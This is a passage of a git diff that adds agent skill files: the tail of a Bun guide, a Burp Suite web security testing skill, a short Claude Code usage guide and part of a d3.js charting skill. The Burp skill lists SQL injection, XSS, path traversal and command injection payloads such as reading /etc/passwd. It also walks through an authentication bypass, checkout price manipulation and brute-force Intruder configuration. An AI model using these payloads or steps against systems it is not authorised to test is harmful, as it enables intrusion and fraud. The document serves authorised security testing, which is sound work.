const resolved = import.meta.resolve("pkg");
|
||||
Bun.resolveSync("pkg", process.cwd());
|
||||
|
||||
// ❌ These globals differ
|
||||
process.hrtime() // Use Bun.nanoseconds()
|
||||
setImmediate() // Use queueMicrotask()
|
||||
|
||||
// ✅ Bun-specific features
|
||||
const file = Bun.file("./data.txt"); // Fast file API
|
||||
Bun.serve({ port: 3000, fetch: ... }); // Fast HTTP server
|
||||
Bun.password.hash(password); // Built-in hashing
|
||||
```
|
||||
|
||||
---
|
||||
|
||||
## 9. Performance Tips
|
||||
|
||||
### 9.1 Use Bun-native APIs
|
||||
|
||||
```typescript
|
||||
// Slow (Node.js compat)
|
||||
import fs from "fs/promises";
|
||||
const content = await fs.readFile("./data.txt", "utf-8");
|
||||
|
||||
// Fast (Bun-native)
|
||||
const file = Bun.file("./data.txt");
|
||||
const content = await file.text();
|
||||
```
|
||||
|
||||
### 9.2 Use Bun.serve for HTTP
|
||||
|
||||
```typescript
|
||||
// Don't: Express/Fastify (overhead)
|
||||
import express from "express";
|
||||
const app = express();
|
||||
|
||||
// Do: Bun.serve (native, 4-10x faster)
|
||||
Bun.serve({
|
||||
fetch(req) {
|
||||
return new Response("Hello!");
|
||||
},
|
||||
});
|
||||
|
||||
// Or use Elysia (Bun-optimized framework)
|
||||
import { Elysia } from "elysia";
|
||||
new Elysia().get("/", () => "Hello!").listen(3000);
|
||||
```
|
||||
|
||||
### 9.3 Bundle for Production
|
||||
|
||||
```bash
|
||||
# Always bundle and minify for production
|
||||
bun build ./src/index.ts --outdir ./dist --minify --target node
|
||||
|
||||
# Then run the bundle
|
||||
bun run ./dist/index.js
|
||||
```
|
||||
|
||||
---
|
||||
|
||||
## Quick Reference
|
||||
|
||||
| Task | Command |
|
||||
| :----------- | :----------------------------------------- |
|
||||
| Init project | `bun init` |
|
||||
| Install deps | `bun install` |
|
||||
| Add package | `bun add <pkg>` |
|
||||
| Run script | `bun run <script>` |
|
||||
| Run file | `bun run file.ts` |
|
||||
| Watch mode | `bun --watch run file.ts` |
|
||||
| Run tests | `bun test` |
|
||||
| Build | `bun build ./src/index.ts --outdir ./dist` |
|
||||
| Execute pkg | `bunx <pkg>` |
|
||||
|
||||
---
|
||||
|
||||
## Resources
|
||||
|
||||
- [Bun Documentation](https://bun.sh/docs)
|
||||
- [Bun GitHub](https://github.com/oven-sh/bun)
|
||||
- [Elysia Framework](https://elysiajs.com/)
|
||||
- [Bun Discord](https://bun.sh/discord)
|
||||
377
skills/burp-suite-testing/SKILL.md
Normal file
377
skills/burp-suite-testing/SKILL.md
Normal file
@@ -0,0 +1,377 @@
|
||||
---
|
||||
name: Burp Suite Web Application Testing
|
||||
description: This skill should be used when the user asks to "intercept HTTP traffic", "modify web requests", "use Burp Suite for testing", "perform web vulnerability scanning", "test with Burp Repeater", "analyze HTTP history", or "configure proxy for web testing". It provides comprehensive guidance for using Burp Suite's core features for web application security testing.
|
||||
---
|
||||
|
||||
# Burp Suite Web Application Testing
|
||||
|
||||
## Purpose
|
||||
|
||||
Execute comprehensive web application security testing using Burp Suite's integrated toolset, including HTTP traffic interception and modification, request analysis and replay, automated vulnerability scanning, and manual testing workflows. This skill enables systematic discovery and exploitation of web application vulnerabilities through proxy-based testing methodology.
|
||||
|
||||
## Inputs / Prerequisites
|
||||
|
||||
### Required Tools
|
||||
- Burp Suite Community or Professional Edition installed
|
||||
- Burp's embedded browser or configured external browser
|
||||
- Target web application URL
|
||||
- Valid credentials for authenticated testing (if applicable)
|
||||
|
||||
### Environment Setup
|
||||
- Burp Suite launched with temporary or named project
|
||||
- Proxy listener active on 127.0.0.1:8080 (default)
|
||||
- Browser configured to use Burp proxy (or use Burp's browser)
|
||||
- CA certificate installed for HTTPS interception
|
||||
|
||||
### Editions Comparison
|
||||
| Feature | Community | Professional |
|
||||
|---------|-----------|--------------|
|
||||
| Proxy | ✓ | ✓ |
|
||||
| Repeater | ✓ | ✓ |
|
||||
| Intruder | Limited | Full |
|
||||
| Scanner | ✗ | ✓ |
|
||||
| Extensions | ✓ | ✓ |
|
||||
|
||||
## Outputs / Deliverables
|
||||
|
||||
### Primary Outputs
|
||||
- Intercepted and modified HTTP requests/responses
|
||||
- Vulnerability scan reports with remediation advice
|
||||
- HTTP history and site map documentation
|
||||
- Proof-of-concept exploits for identified vulnerabilities
|
||||
|
||||
## Core Workflow
|
||||
|
||||
### Phase 1: Intercepting HTTP Traffic
|
||||
|
||||
#### Launch Burp's Browser
|
||||
Navigate to integrated browser for seamless proxy integration:
|
||||
|
||||
1. Open Burp Suite and create/open project
|
||||
2. Go to **Proxy > Intercept** tab
|
||||
3. Click **Open Browser** to launch preconfigured browser
|
||||
4. Position windows to view both Burp and browser simultaneously
|
||||
|
||||
#### Configure Interception
|
||||
Control which requests are captured:
|
||||
|
||||
```
|
||||
Proxy > Intercept > Intercept is on/off toggle
|
||||
|
||||
When ON: Requests pause for review/modification
|
||||
When OFF: Requests pass through, logged to history
|
||||
```
|
||||
|
||||
#### Intercept and Forward Requests
|
||||
Process intercepted traffic:
|
||||
|
||||
1. Set intercept toggle to **Intercept on**
|
||||
2. Navigate to target URL in browser
|
||||
3. Observe request held in Proxy > Intercept tab
|
||||
4. Review request contents (headers, parameters, body)
|
||||
5. Click **Forward** to send request to server
|
||||
6. Continue forwarding subsequent requests until page loads
|
||||
|
||||
#### View HTTP History
|
||||
Access complete traffic log:
|
||||
|
||||
1. Go to **Proxy > HTTP history** tab
|
||||
2. Click any entry to view full request/response
|
||||
3. Sort by clicking column headers (# for chronological order)
|
||||
4. Use filters to focus on relevant traffic
|
||||
|
||||
### Phase 2: Modifying Requests
|
||||
|
||||
#### Intercept and Modify
|
||||
Change request parameters before forwarding:
|
||||
|
||||
1. Enable interception: **Intercept on**
|
||||
2. Trigger target request in browser
|
||||
3. Locate parameter to modify in intercepted request
|
||||
4. Edit value directly in request editor
|
||||
5. Click **Forward** to send modified request
|
||||
|
||||
#### Common Modification Targets
|
||||
| Target | Example | Purpose |
|
||||
|--------|---------|---------|
|
||||
| Price parameters | `price=1` | Test business logic |
|
||||
| User IDs | `userId=admin` | Test access control |
|
||||
| Quantity values | `qty=-1` | Test input validation |
|
||||
| Hidden fields | `isAdmin=true` | Test privilege escalation |
|
||||
|
||||
#### Example: Price Manipulation
|
||||
|
||||
```http
|
||||
POST /cart HTTP/1.1
|
||||
Host: target.com
|
||||
Content-Type: application/x-www-form-urlencoded
|
||||
|
||||
productId=1&quantity=1&price=100
|
||||
|
||||
# Modify to:
|
||||
productId=1&quantity=1&price=1
|
||||
```
|
||||
|
||||
Result: Item added to cart at modified price.
|
||||
|
||||
### Phase 3: Setting Target Scope
|
||||
|
||||
#### Define Scope
|
||||
Focus testing on specific target:
|
||||
|
||||
1. Go to **Target > Site map**
|
||||
2. Right-click target host in left panel
|
||||
3. Select **Add to scope**
|
||||
4. When prompted, click **Yes** to exclude out-of-scope traffic
|
||||
|
||||
#### Filter by Scope
|
||||
Remove noise from HTTP history:
|
||||
|
||||
1. Click display filter above HTTP history
|
||||
2. Select **Show only in-scope items**
|
||||
3. History now shows only target site traffic
|
||||
|
||||
#### Scope Benefits
|
||||
- Reduces clutter from third-party requests
|
||||
- Prevents accidental testing of out-of-scope sites
|
||||
- Improves scanning efficiency
|
||||
- Creates cleaner reports
|
||||
|
||||
### Phase 4: Using Burp Repeater
|
||||
|
||||
#### Send Request to Repeater
|
||||
Prepare request for manual testing:
|
||||
|
||||
1. Identify interesting request in HTTP history
|
||||
2. Right-click request and select **Send to Repeater**
|
||||
3. Go to **Repeater** tab to access request
|
||||
|
||||
#### Modify and Resend
|
||||
Test different inputs efficiently:
|
||||
|
||||
```
|
||||
1. View request in Repeater tab
|
||||
2. Modify parameter values
|
||||
3. Click Send to submit request
|
||||
4. Review response in right panel
|
||||
5. Use navigation arrows to review request history
|
||||
```
|
||||
|
||||
#### Repeater Testing Workflow
|
||||
|
||||
```
|
||||
Original Request:
|
||||
GET /product?productId=1 HTTP/1.1
|
||||
|
||||
Test 1: productId=2 → Valid product response
|
||||
Test 2: productId=999 → Not Found response
|
||||
Test 3: productId=' → Error/exception response
|
||||
Test 4: productId=1 OR 1=1 → SQL injection test
|
||||
```
|
||||
|
||||
#### Analyze Responses
|
||||
Look for indicators of vulnerabilities:
|
||||
|
||||
- Error messages revealing stack traces
|
||||
- Framework/version information disclosure
|
||||
- Different response lengths indicating logic flaws
|
||||
- Timing differences suggesting blind injection
|
||||
- Unexpected data in responses
|
||||
|
||||
### Phase 5: Running Automated Scans
|
||||
|
||||
#### Launch New Scan
|
||||
Initiate vulnerability scanning (Professional only):
|
||||
|
||||
1. Go to **Dashboard** tab
|
||||
2. Click **New scan**
|
||||
3. Enter target URL in **URLs to scan** field
|
||||
4. Configure scan settings
|
||||
|
||||
#### Scan Configuration Options
|
||||
|
||||
| Mode | Description | Duration |
|
||||
|------|-------------|----------|
|
||||
| Lightweight | High-level overview | ~15 minutes |
|
||||
| Fast | Quick vulnerability check | ~30 minutes |
|
||||
| Balanced | Standard comprehensive scan | ~1-2 hours |
|
||||
| Deep | Thorough testing | Several hours |
|
||||
|
||||
#### Monitor Scan Progress
|
||||
Track scanning activity:
|
||||
|
||||
1. View task status in **Dashboard**
|
||||
2. Watch **Target > Site map** update in real-time
|
||||
3. Check **Issues** tab for discovered vulnerabilities
|
||||
|
||||
#### Review Identified Issues
|
||||
Analyze scan findings:
|
||||
|
||||
1. Select scan task in Dashboard
|
||||
2. Go to **Issues** tab
|
||||
3. Click issue to view:
|
||||
- **Advisory**: Description and remediation
|
||||
- **Request**: Triggering HTTP request
|
||||
- **Response**: Server response showing vulnerability
|
||||
|
||||
### Phase 6: Intruder Attacks
|
||||
|
||||
#### Configure Intruder
|
||||
Set up automated attack:
|
||||
|
||||
1. Send request to Intruder (right-click > Send to Intruder)
|
||||
2. Go to **Intruder** tab
|
||||
3. Define payload positions using § markers
|
||||
4. Select attack type
|
||||
|
||||
#### Attack Types
|
||||
|
||||
| Type | Description | Use Case |
|
||||
|------|-------------|----------|
|
||||
| Sniper | Single position, iterate payloads | Fuzzing one parameter |
|
||||
| Battering ram | Same payload all positions | Credential testing |
|
||||
| Pitchfork | Parallel payload iteration | Username:password pairs |
|
||||
| Cluster bomb | All payload combinations | Full brute force |
|
||||
|
||||
#### Configure Payloads
|
||||
|
||||
```
|
||||
Positions Tab:
|
||||
POST /login HTTP/1.1
|
||||
...
|
||||
username=§admin§&password=§password§
|
||||
|
||||
Payloads Tab:
|
||||
Set 1: admin, user, test, guest
|
||||
Set 2: password, 123456, admin, letmein
|
||||
```
|
||||
|
||||
#### Analyze Results
|
||||
Review attack output:
|
||||
|
||||
- Sort by response length to find anomalies
|
||||
- Filter by status code for successful attempts
|
||||
- Use grep to search for specific strings
|
||||
- Export results for documentation
|
||||
|
||||
## Quick Reference
|
||||
|
||||
### Keyboard Shortcuts
|
||||
| Action | Windows/Linux | macOS |
|
||||
|--------|---------------|-------|
|
||||
| Forward request | Ctrl+F | Cmd+F |
|
||||
| Drop request | Ctrl+D | Cmd+D |
|
||||
| Send to Repeater | Ctrl+R | Cmd+R |
|
||||
| Send to Intruder | Ctrl+I | Cmd+I |
|
||||
| Toggle intercept | Ctrl+T | Cmd+T |
|
||||
|
||||
### Common Testing Payloads
|
||||
|
||||
```
|
||||
# SQL Injection
|
||||
' OR '1'='1
|
||||
' OR '1'='1'--
|
||||
1 UNION SELECT NULL--
|
||||
|
||||
# XSS
|
||||
<script>alert(1)</script>
|
||||
"><img src=x onerror=alert(1)>
|
||||
javascript:alert(1)
|
||||
|
||||
# Path Traversal
|
||||
../../../etc/passwd
|
||||
..\..\..\..\windows\win.ini
|
||||
|
||||
# Command Injection
|
||||
; ls -la
|
||||
| cat /etc/passwd
|
||||
`whoami`
|
||||
```
|
||||
|
||||
### Request Modification Tips
|
||||
- Right-click for context menu options
|
||||
- Use decoder for encoding/decoding
|
||||
- Compare requests using Comparer tool
|
||||
- Save interesting requests to project
|
||||
|
||||
## Constraints and Guardrails
|
||||
|
||||
### Operational Boundaries
|
||||
- Test only authorized applications
|
||||
- Configure scope to prevent accidental out-of-scope testing
|
||||
- Rate-limit scans to avoid denial of service
|
||||
- Document all findings and actions
|
||||
|
||||
### Technical Limitations
|
||||
- Community Edition lacks automated scanner
|
||||
- Some sites may block proxy traffic
|
||||
- HSTS/certificate pinning may require additional configuration
|
||||
- Heavy scanning may trigger WAF blocks
|
||||
|
||||
### Best Practices
|
||||
- Always set target scope before extensive testing
|
||||
- Use Burp's browser for reliable interception
|
||||
- Save project regularly to preserve work
|
||||
- Review scan results manually for false positives
|
||||
|
||||
## Examples
|
||||
|
||||
### Example 1: Business Logic Testing
|
||||
|
||||
**Scenario**: E-commerce price manipulation
|
||||
|
||||
1. Add item to cart normally, intercept request
|
||||
2. Identify `price=9999` parameter in POST body
|
||||
3. Modify to `price=1`
|
||||
4. Forward request
|
||||
5. Complete checkout at manipulated price
|
||||
|
||||
**Finding**: Server trusts client-provided price values.
|
||||
|
||||
### Example 2: Authentication Bypass
|
||||
|
||||
**Scenario**: Testing login form
|
||||
|
||||
1. Submit valid credentials, capture request in Repeater
|
||||
2. Send to Repeater for testing
|
||||
3. Try: `username=admin' OR '1'='1'--`
|
||||
4. Observe successful login response
|
||||
|
||||
**Finding**: SQL injection in authentication.
|
||||
|
||||
### Example 3: Information Disclosure
|
||||
|
||||
**Scenario**: Error-based information gathering
|
||||
|
||||
1. Navigate to product page, observe `productId` parameter
|
||||
2. Send request to Repeater
|
||||
3. Change `productId=1` to `productId=test`
|
||||
4. Observe verbose error revealing framework version
|
||||
|
||||
**Finding**: Apache Struts 2.5.12 disclosed in stack trace.
|
||||
|
||||
## Troubleshooting
|
||||
|
||||
### Browser Not Connecting Through Proxy
|
||||
- Verify proxy listener is active (Proxy > Options)
|
||||
- Check browser proxy settings point to 127.0.0.1:8080
|
||||
- Ensure no firewall blocking local connections
|
||||
- Use Burp's embedded browser for reliable setup
|
||||
|
||||
### HTTPS Interception Failing
|
||||
- Install Burp CA certificate in browser/system
|
||||
- Navigate to http://burp to download certificate
|
||||
- Add certificate to trusted roots
|
||||
- Restart browser after installation
|
||||
|
||||
### Slow Performance
|
||||
- Limit scope to reduce processing
|
||||
- Disable unnecessary extensions
|
||||
- Increase Java heap size in startup options
|
||||
- Close unused Burp tabs and features
|
||||
|
||||
### Requests Not Being Intercepted
|
||||
- Verify "Intercept on" is enabled
|
||||
- Check intercept rules aren't filtering target
|
||||
- Ensure browser is using Burp proxy
|
||||
- Verify target isn't using unsupported protocol
|
||||
68
skills/claude-code-guide/SKILL.md
Normal file
68
skills/claude-code-guide/SKILL.md
Normal file
@@ -0,0 +1,68 @@
|
||||
---
|
||||
name: Claude Code Guide
|
||||
description: Master guide for using Claude Code effectively. Includes configuration templates, prompting strategies "Thinking" keywords, debugging techniques, and best practices for interacting with the agent.
|
||||
---
|
||||
|
||||
# Claude Code Guide
|
||||
|
||||
## Purpose
|
||||
|
||||
To provide a comprehensive reference for configuring and using Claude Code (the agentic coding tool) to its full potential. This skill synthesizes best practices, configuration templates, and advanced usage patterns.
|
||||
|
||||
## Configuration (`CLAUDE.md`)
|
||||
|
||||
When starting a new project, create a `CLAUDE.md` file in the root directory to guide the agent.
|
||||
|
||||
### Template (General)
|
||||
|
||||
```markdown
|
||||
# Project Guidelines
|
||||
|
||||
## Commands
|
||||
|
||||
- Run app: `npm run dev`
|
||||
- Test: `npm test`
|
||||
- Build: `npm run build`
|
||||
|
||||
## Code Style
|
||||
|
||||
- Use TypeScript for all new code.
|
||||
- Functional components with Hooks for React.
|
||||
- Tailwind CSS for styling.
|
||||
- Early returns for error handling.
|
||||
|
||||
## Workflow
|
||||
|
||||
- Read `README.md` first to understand project context.
|
||||
- Before editing, read the file content.
|
||||
- After editing, run tests to verify.
|
||||
```
|
||||
|
||||
## Advanced Features
|
||||
|
||||
### Thinking Keywords
|
||||
|
||||
Use these keywords in your prompts to trigger deeper reasoning from the agent:
|
||||
|
||||
- "Think step-by-step"
|
||||
- "Analyze the root cause"
|
||||
- "Plan before executing"
|
||||
- "Verify your assumptions"
|
||||
|
||||
### Debugging
|
||||
|
||||
If the agent is stuck or behaving unexpectedly:
|
||||
|
||||
1. **Clear Context**: Start a new session or ask the agent to "forget previous instructions" if confused.
|
||||
2. **Explicit Instructions**: Be extremely specific about paths, filenames, and desired outcomes.
|
||||
3. **Logs**: Ask the agent to "check the logs" or "run the command with verbose output".
|
||||
|
||||
## Best Practices
|
||||
|
||||
1. **Small Contexts**: Don't dump the entire codebase into the context. Use `grep` or `find` to locate relevant files first.
|
||||
2. **Iterative Development**: Ask for small changes, verify, then proceed.
|
||||
3. **Feedback Loop**: If the agent makes a mistake, correct it immediately and ask it to "add a lesson" to its memory (if supported) or `CLAUDE.md`.
|
||||
|
||||
## Reference
|
||||
|
||||
Based on [Claude Code Guide by zebbern](https://github.com/zebbern/claude-code-guide).
|
||||
Submodule skills/claude-d3js-skill deleted from e198c87d03
820
skills/claude-d3js-skill/SKILL.md
Normal file
820
skills/claude-d3js-skill/SKILL.md
Normal file
@@ -0,0 +1,820 @@
|
||||
---
|
||||
name: d3-viz
|
||||
description: Creating interactive data visualisations using d3.js. This skill should be used when creating custom charts, graphs, network diagrams, geographic visualisations, or any complex SVG-based data visualisation that requires fine-grained control over visual elements, transitions, or interactions. Use this for bespoke visualisations beyond standard charting libraries, whether in React, Vue, Svelte, vanilla JavaScript, or any other environment.
|
||||
---
|
||||
|
||||
# D3.js Visualisation
|
||||
|
||||
## Overview
|
||||
|
||||
This skill provides guidance for creating sophisticated, interactive data visualisations using d3.js. D3.js (Data-Driven Documents) excels at binding data to DOM elements and applying data-driven transformations to create custom, publication-quality visualisations with precise control over every visual element. The techniques work across any JavaScript environment, including vanilla JavaScript, React, Vue, Svelte, and other frameworks.
|
||||
|
||||
## When to use d3.js
|
||||
|
||||
**Use d3.js for:**
|
||||
- Custom visualisations requiring unique visual encodings or layouts
|
||||
- Interactive explorations with complex pan, zoom, or brush behaviours
|
||||
- Network/graph visualisations (force-directed layouts, tree diagrams, hierarchies, chord diagrams)
|
||||
- Geographic visualisations with custom projections
|
||||
- Visualisations requiring smooth, choreographed transitions
|
||||
- Publication-quality graphics with fine-grained styling control
|
||||
- Novel chart types not available in standard libraries
|
||||
|
||||
**Consider alternatives for:**
|
||||
- 3D visualisations - use Three.js instead
|
||||
|
||||
## Core workflow
|
||||
|
||||
### 1. Set up d3.js
|
||||
|
||||
Import d3 at the top of your script:
|
||||
|
||||
```javascript
|
||||
import * as d3 from 'd3';
|
||||
```
|
||||
|
||||
Or use the CDN version (7.x):
|
||||
|
||||
```html
|
||||
<script src="https://d3js.org/d3.v7.min.js"></script>
|
||||
```
|
||||
|
||||
All modules (scales, axes, shapes, transitions, etc.) are accessible through the `d3` namespace.
|
||||
|
||||
### 2. Choose the integration pattern
|
||||
|
||||
**Pattern A: Direct DOM manipulation (recommended for most cases)**
|
||||
Use d3 to select DOM elements and manipulate them imperatively. This works in any JavaScript environment:
|
||||
|
||||
```javascript
|
||||
function drawChart(data) {
|
||||
if (!data || data.length === 0) return;
|
||||
|
||||
const svg = d3.select('#chart'); // Select by ID, class, or DOM element
|
||||
|
||||
// Clear previous content
|
||||
svg.selectAll("*").remove();
|
||||
|
||||
// Set up dimensions
|
||||
const width = 800;
|
||||
const height = 400;
|
||||
const margin = { top: 20, right: 30, bottom: 40, left: 50 };
|
||||
|
||||
// Create scales, axes, and draw visualisation
|
||||
// ... d3 code here ...
|
||||
}
|
||||
|
||||
// Call when data changes
|
||||
drawChart(myData);
|
||||
```
|
||||
|
||||
**Pattern B: Declarative rendering (for frameworks with templating)**
|
||||
Use d3 for data calculations (scales, layouts) but render elements via your framework:
|
||||
|
||||
```javascript
|
||||
function getChartElements(data) {
|
||||
const xScale = d3.scaleLinear()
|
||||
.domain([0, d3.max(data, d => d.value)])
|
||||
.range([0, 400]);
|
||||
|
||||
return data.map((d, i) => ({
|
||||
x: 50,
|
||||
y: i * 30,
|
||||
width: xScale(d.value),
|
||||
height: 25
|
||||
}));
|
||||
}
|
||||
|
||||
// In React: {getChartElements(data).map((d, i) => <rect key={i} {...d} fill="steelblue" />)}
|
||||
// In Vue: v-for directive over the returned array
|
||||
// In vanilla JS: Create elements manually from the returned data
|
||||
```
|
||||
|
||||
Use Pattern A for complex visualisations with transitions, interactions, or when leveraging d3's full capabilities. Use Pattern B for simpler visualisations or when your framework prefers declarative rendering.
|
||||
|
||||
### 3. Structure the visualisation code
|
||||
|
||||
Follow this standard structure in your drawing function:
|
||||
|
||||
```javascript
|
||||
function drawVisualization(data) {
|
||||
if (!data || data.length === 0) return;
|
||||
|
||||
const svg = d3.select('#chart'); // Or pass a selector/element
|
||||
svg.selectAll("*").remove(); // Clear previous render
|
||||
|
||||
// 1. Define dimensions
|
||||
const width = 800;
|
||||
const height = 400;
|
||||
const margin = { top: 20, right: 30, bottom: 40, left: 50 };
|
||||
const innerWidth = width - margin.left - margin.right;
|
||||
const innerHeight = height - margin.top - margin.bottom;
|
||||
|
||||
// 2. Create main group with margins
|
||||
const g = svg.append("g")
|
||||
.attr("transform", `translate(${margin.left},${margin.top})`);
|
||||
|
||||
// 3. Create scales
|
||||
const xScale = d3.scaleLinear()
|
||||
.domain([0, d3.max(data, d => d.x)])
|
||||
.range([0, innerWidth]);
|
||||
|
||||
const yScale = d3.scaleLinear()
|
||||
.domain([0, d3.max(data, d => d.y)])
|
||||
.range([innerHeight, 0]); // Note: inverted for SVG coordinates
|
||||
|
||||
// 4. Create and append axes
|
||||
const xAxis = d3.axisBottom(xScale);
|
||||
const yAxis = d3.axisLeft(yScale);
|
||||
|
||||
g.append("g")
|
||||
.attr("transform", `translate(0,${innerHeight})`)
|
||||
.call(xAxis);
|
||||
|
||||
g.append("g")
|
||||
.call(yAxis);
|
||||
|
||||
// 5. Bind data and create visual elements
|
||||
g.selectAll("circle")
|
||||
.data(data)
|
||||
.join("circle")
|
||||
.attr("cx", d => xScale(d.x))
|
||||
.attr("cy", d => yScale(d.y))
|
||||
.attr("r", 5)
|
||||
.attr("fill", "steelblue");
|
||||
}
|
||||
|
||||
// Call when data changes
|
||||
drawVisualization(myData);
|
||||
```
|
||||
|
||||
### 4. Implement responsive sizing
|
||||
|
||||
Make visualisations responsive to container size:
|
||||
|
||||
```javascript
|
||||
function setupResponsiveChart(containerId, data) {
|
||||
const container = document.getElementById(containerId);
|
||||
const svg = d3.select(`#${containerId}`).append('svg');
|
||||
|
||||
function updateChart() {
|
||||
const { width, height } = container.getBoundingClientRect();
|
||||
svg.attr('width', width).attr('height', height);
|
||||
|
||||
// Redraw visualisation with new dimensions
|
||||
drawChart(data, svg, width, height);
|
||||
}
|
||||
|
||||
// Update on initial load
|
||||
updateChart();
|
||||
|
||||
// Update on window resize
|
||||
window.addEventListener('resize', updateChart);
|
||||
|
||||
// Return cleanup function
|
||||
return () => window.removeEventListener('resize', updateChart);
|
||||
}
|
||||
|
||||
// Usage:
|
||||
// const cleanup = setupResponsiveChart('chart-container', myData);
|
||||
// cleanup(); // Call when component unmounts or element removed
|
||||
```
|
||||
|
||||
Or use ResizeObserver for more direct container monitoring:
|
||||
|
||||
```javascript
|
||||
function setupResponsiveChartWithObserver(svgElement, data) {
|
||||
const observer = new ResizeObserver(() => {
|
||||
const { width, height } = svgElement.getBoundingClientRect();
|
||||
d3.select(svgElement)
|
||||
.attr('width', width)
|
||||
.attr('height', height);
|
||||
|
||||
// Redraw visualisation
|
||||
drawChart(data, d3.select(svgElement), width, height);
|
||||
});
|
||||
|
||||
observer.observe(svgElement.parentElement);
|
||||
return () => observer.disconnect();
|
||||
}
|
||||
```
|
||||
|
||||
## Common visualisation patterns
|
||||
|
||||
### Bar chart
|
||||
|
||||
```javascript
|
||||
function drawBarChart(data, svgElement) {
|
||||
if (!data || data.length === 0) return;
|
||||
|
||||
const svg = d3.select(svgElement);
|
||||
svg.selectAll("*").remove();
|
||||
|
||||
const width = 800;
|
||||
const height = 400;
|
||||
const margin = { top: 20, right: 30, bottom: 40, left: 50 };
|
||||
const innerWidth = width - margin.left - margin.right;
|
||||
const innerHeight = height - margin.top - margin.bottom;
|
||||
|
||||
const g = svg.append("g")
|
||||
.attr("transform", `translate(${margin.left},${margin.top})`);
|
||||
|
||||
const xScale = d3.scaleBand()
|
||||
.domain(data.map(d => d.category))
|
||||
.range([0, innerWidth])
|
||||
.padding(0.1);
|
||||
|
||||
const yScale = d3.scaleLinear()
|
||||
.domain([0, d3.max(data, d => d.value)])
|
||||
.range([innerHeight, 0]);
|
||||
|
||||
g.append("g")
|
||||
.attr("transform", `translate(0,${innerHeight})`)
|
||||
.call(d3.axisBottom(xScale));
|
||||
|
||||
g.append("g")
|
||||
.call(d3.axisLeft(yScale));
|
||||
|
||||
g.selectAll("rect")
|
||||
.data(data)
|
||||
.join("rect")
|
||||
.attr("x", d => xScale(d.category))
|
||||
.attr("y", d => yScale(d.value))
|
||||
.attr("width", xScale.bandwidth())
|
||||
.attr("height", d => innerHeight - yScale(d.value))
|
||||
.attr("fill", "steelblue");
|
||||
}
|
||||
|
||||
// Usage:
|
||||
// drawBarChart(myData, document.getElementById('chart'));
|
||||
```
|
||||
|
||||
### Line chart
|
||||
|
||||
```javascript
|
||||
const line = d3.line()
|
||||
.x(d => xScale(d.date))
|
||||
.y(d => yScale(d.value))
|
||||
.curve(d3.curveMonotoneX); // Smooth curve
|
||||
|
||||
g.append("path")
|
||||
.datum(data)
|
||||
.attr("fill", "none")
|
||||
.attr("stroke", "steelblue")
|
||||
.attr("stroke-width", 2)
|
||||
.attr("d", line);
|
||||
```
|
||||
|
||||
### Scatter plot
|
||||
|
||||
```javascript
|
||||
g.selectAll("circle")
|
||||
.data(data)
|
||||
.join("circle")
|
||||
.attr("cx", d => xScale(d.x))
|
||||
.attr("cy", d => yScale(d.y))
|
||||
.attr("r", d => sizeScale(d.size)) // Optional: size encoding
|
||||
.attr("fill", d => colourScale(d.category)) // Optional: colour encoding
|
||||
.attr("opacity", 0.7);
|
||||
```
|
||||
|
||||
### Chord diagram
|
||||
|
||||
A chord diagram shows relationships between entities in a circular layout, with ribbons representing flows between them:
|
||||
|
||||
```javascript
|
||||
function drawChordDiagram(data) {
|
||||
// data format: array of objects with source, target, and value
|
||||
// Example: [{ source: 'A', target: 'B', value: 10 }, ...]
|
||||
|
||||
if (!data || data.length === 0) return;
|
||||
|
||||
const svg = d3.select('#chart');
|
||||
svg.selectAll("*").remove();
|
||||
|
||||
const width = 600;
|
||||
const height = 600;
|
||||
const innerRadius = Math.min(width, height) * 0.3;
|
||||
const outerRadius = innerRadius + 30;
|
||||
|
||||
// Create matrix from data
|
||||
const nodes = Array.from(new Set(data.flatMap(d => [d.source, d.target])));
|
||||
const matrix = Array.from({ length: nodes.length }, () => Array(nodes.length).fill(0));
|
||||
|
||||
data.forEach(d => {
|
||||
const i = nodes.indexOf(d.source);
|
||||
const j = nodes.indexOf(d.target);
|
||||
matrix[i][j] += d.value;
|
||||
matrix[j][i] += d.value;
|
||||
});
|
||||
|
||||
// Create chord layout
|
||||
const chord = d3.chord()
|
||||
.padAngle(0.05)
|
||||
.sortSubgroups(d3.descending);
|
||||
|
||||
const arc = d3.arc()
|
||||
.innerRadius(innerRadius)
|
||||
.outerRadius(outerRadius);
|
||||
|
||||
const ribbon = d3.ribbon()
|
||||
.source(d => d.source)
|
||||
.target(d => d.target);
|
||||
|
||||
const colourScale = d3.scaleOrdinal(d3.schemeCategory10)
|
||||
.domain(nodes);
|
||||
|
||||
const g = svg.append("g")
|
||||
.attr("transform", `translate(${width / 2},${height / 2})`);
|
||||
|
||||
const chords = chord(matrix);
|
||||
|
||||
// Draw ribbons
|
||||
g.append("g")
|
||||
.attr("fill-opacity", 0.67)
|
||||
.selectAll("path")
|
||||
.data(chords)
|
||||
.join("path")
|
||||
.attr("d", ribbon)
|
||||
.attr("fill", d => colourScale(nodes[d.source.index]))
|
||||
.attr("stroke", d => d3.rgb(colourScale(nodes[d.source.index])).darker());
|
||||
|
||||
// Draw groups (arcs)
|
||||
const group = g.append("g")
|
||||
.selectAll("g")
|
||||
.data(chords.groups)
|
||||
.join("g");
|
||||
|
||||
group.append("path")
|
||||
.attr("d", arc)
|
||||
.attr("fill", d => colourScale(nodes[d.index]))
|
||||
.attr("stroke", d => d3.rgb(colourScale(nodes[d.index])).darker());
|
||||
|
||||
// Add labels
|
||||
group.append("text")
|
||||
.each(d => { d.angle = (d.startAngle + d.endAngle) / 2; })
|
||||
.attr("dy", "0.31em")
|
||||
.attr("transform", d => `rotate(${(d.angle * 180 / Math.PI) - 90})translate(${outerRadius + 30})${d.angle > Math.PI ? "rotate(180)" : ""}`)
|
||||
.attr("text-anchor", d => d.angle > Math.PI ? "end" : null)
|
||||
.text((d, i) => nodes[i])
|
||||
.style("font-size", "12px");
|
||||
}
|
||||
```
|
||||
|
||||
### Heatmap
|
||||
|
||||
A heatmap uses colour to encode values in a two-dimensional grid, useful for showing patterns across categories:
|
||||
|
||||
```javascript
|
||||
function drawHeatmap(data) {
|
||||
// data format: array of objects with row, column, and value
|
||||
// Example: [{ row: 'A', column: 'X', value: 10 }, ...]
|
||||
|
||||
if (!data || data.length === 0) return;
|
||||
|
||||
const svg = d3.select('#chart');
|
||||
svg.selectAll("*").remove();
|
||||
|
||||
const width = 800;
|
||||
const height = 600;
|
||||
const margin = { top: 100, right: 30, bottom: 30, left: 100 };
|
||||
const innerWidth = width - margin.left - margin.right;
|
||||
const innerHeight = height - margin.top - margin.bottom;
|
||||
|
||||
// Get unique rows and columns
|
||||
